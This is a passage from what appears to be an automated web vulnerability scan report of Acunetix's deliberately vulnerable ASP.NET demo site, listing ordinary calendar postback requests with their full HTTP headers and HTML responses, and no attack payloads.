href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8224&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAHM10YNoIZGRkSPlrKWVgvbEaKkL07xcEp3NhtKw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK51YyDBgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2FVLQIyX14bUEhd1%2Fp9nR09w5G5Fw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:12:12 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAHM10YNoIZGRkSPlrKWVgvbEaKkL07xcEp3NhtKw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK51YyDBgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/VLQIyX14bUEhd1/p9nR09w5G5Fw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:White" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1121 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,121 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8133&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgAAhbnyGNoIZGRkM9cq59XqAXl1jUP5Q%2FFgfH%2FvHzk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK55%2BamAwKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDJzl7OO3KNsZQFZBeHIA8TMKzo4Y
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:12:47 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgAAhbnyGNoIZGRkM9cq59XqAXl1jUP5Q/FgfH/vHzk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK55+amAwKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDJzl7OO3KNsZQFZBeHIA8TMKzo4Y" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:White" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 